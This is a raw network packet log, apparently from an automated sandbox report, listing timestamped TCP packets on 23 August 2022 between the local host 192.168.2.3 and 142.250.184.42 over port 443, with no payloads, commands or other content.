Aug 23, 2022 03:43:41.949004889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949032068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949047089 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.949059010 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949084997 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949150085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949177027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949233055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949261904 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949265003 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.949290037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949337006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949393034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949420929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949446917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949501038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949528933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949554920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949580908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949609041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949635029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949662924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949687958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949713945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949740887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949767113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949794054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949820995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949847937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949873924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949899912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949940920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.949995995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950023890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950050116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950076103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950102091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950128078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950151920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950181007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950227022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950253010 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950278044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950376987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950416088 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.950557947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950587034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950615883 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950642109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950668097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950702906 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.950748920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950776100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950802088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950829029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950855970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950881004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950907946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950943947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950965881 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.950970888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.950999022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951025009 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951071024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951123953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951205015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951231956 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951258898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951267958 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.951283932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951311111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951396942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951426029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951452971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951512098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951556921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951585054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951648951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951679945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951708078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951735973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951762915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951792002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951818943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951847076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951869965 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.951874018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951901913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.951987028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952035904 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952064991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952068090 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.952092886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952121973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952148914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952177048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952225924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952256918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952263117 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.952323914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952353001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952378988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952408075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952433109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952457905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952523947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952550888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952578068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952604055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952629089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952677965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952704906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952785969 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.952796936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952827930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952855110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952882051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952910900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952939034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.952975035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953001976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953032017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953058958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953085899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953111887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953110933 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.953140974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953167915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953191996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953218937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953246117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953270912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953296900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953316927 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.953322887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953349113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953376055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953402042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953428030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953460932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953486919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953512907 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953540087 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953566074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953592062 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953622103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953648090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953675985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953701973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953727961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953752995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953758001 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.953780890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953805923 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953833103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953861952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953890085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953910112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953929901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953948975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.953993082 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.954003096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954030991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954195976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954242945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954271078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954282045 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.954297066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954345942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954392910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954449892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954476118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954503059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954531908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954556942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954583883 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954612017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954638004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954667091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954726934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954752922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954781055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954804897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954824924 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.954830885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954858065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954883099 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954906940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954932928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954960108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.954982042 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.954986095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955013990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955182076 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.955193996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955223083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955250978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955276966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955302000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955329895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955382109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955387115 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.955411911 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955439091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955465078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955492020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955518961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955547094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955573082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955600023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955626011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955651045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955676079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955702066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955728054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955754995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955779076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955785990 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.955802917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955831051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955856085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955881119 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955904961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955931902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955957890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.955961943 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.955985069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956012011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956037045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956060886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956087112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956113100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956140041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956167936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956192970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956218004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956243992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956269979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956295967 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956321955 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956347942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956373930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956398964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956425905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956451893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956476927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956501007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956526041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956552029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956579924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956604958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956629992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956655979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956681013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956707001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956757069 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956783056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956809998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956835985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956862926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956887007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956912994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956939936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.956976891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957004070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957029104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957056046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957084894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957109928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957137108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957161903 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957186937 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957212925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957226992 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.957238913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957267046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957293034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957318068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957343102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957370043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957393885 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957420111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957465887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957511902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957541943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957570076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957597017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957623959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957658052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957674980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957694054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957709074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957739115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957771063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957787037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957818031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957870007 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.957902908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957921028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957937002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957952976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.957984924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958000898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958019972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958035946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958055019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958071947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958101988 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.958106995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958142996 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958204031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958224058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958278894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958297968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958431005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958470106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958487988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958547115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958564043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958709002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958728075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958745956 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958764076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958781004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958818913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958836079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958852053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958868980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958888054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.958904982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959008932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959026098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959063053 CEST	443	64969	142.250.184.42	192.168.2.3
